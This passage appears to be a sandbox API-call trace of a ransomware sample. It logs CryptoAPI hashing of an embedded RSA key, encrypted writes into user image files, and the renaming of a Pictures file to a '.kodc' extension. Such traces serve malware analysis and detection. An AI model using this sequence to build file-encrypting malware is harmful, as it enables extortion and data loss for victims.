PUBLIC KEY-----\\\\n") returned 492 [0099.738] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.738] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.738] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.738] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0099.739] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.739] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.739] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.739] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.739] GetLastError () returned 0x0 [0099.740] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.740] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0099.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.740] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.740] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.740] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x5320) returned 0x9ba6d90 [0099.740] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.740] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9be30 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9be78 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7980 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.740] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7998 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.741] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.741] GetCurrentThreadId () returned 0x42c [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5bb8 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.742] GetCurrentThreadId () returned 0x42c [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79b0 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.742] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79e0 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79f8 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a40 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7998 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.743] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79b0 | out: hHeap=0x630000) returned 1 [0099.743] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7998 | out: hHeap=0x630000) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.744] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79f8 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79e0 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.744] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7980 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9be78 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.745] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x531b, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x531b, lpOverlapped=0x0) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.745] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5320, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.745] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.745] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.746] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.746] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.746] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.746] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.746] CloseHandle (hObject=0x5cc) returned 1 [0099.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0099.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0099.747] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\r5xI0I6PQENX7m.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r5xi0i6pqenx7m.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\r5xI0I6PQENX7m.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r5xi0i6pqenx7m.gif.kodc")) returned 1 [0099.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.748] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.749] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5e5adb0, ftCreationTime.dwHighDateTime=0x1d5bc83, ftLastAccessTime.dwLowDateTime=0x704fe190, ftLastAccessTime.dwHighDateTime=0x1d5bac3, ftLastWriteTime.dwLowDateTime=0x704fe190, ftLastWriteTime.dwHighDateTime=0x1d5bac3, nFileSizeHigh=0x0, nFileSizeLow=0x10d04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R6HVEfAHabx.png", cAlternateFileName="R6HVEF~1.PNG")) returned 1 [0099.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.749] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\R6HVEfAHabx.png") returned=".png" [0099.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\R6HVEfAHabx.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\r6hvefahabx.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.749] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=68868) returned 1 [0099.749] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.752] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10cde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.752] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.753] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.753] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.753] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.753] 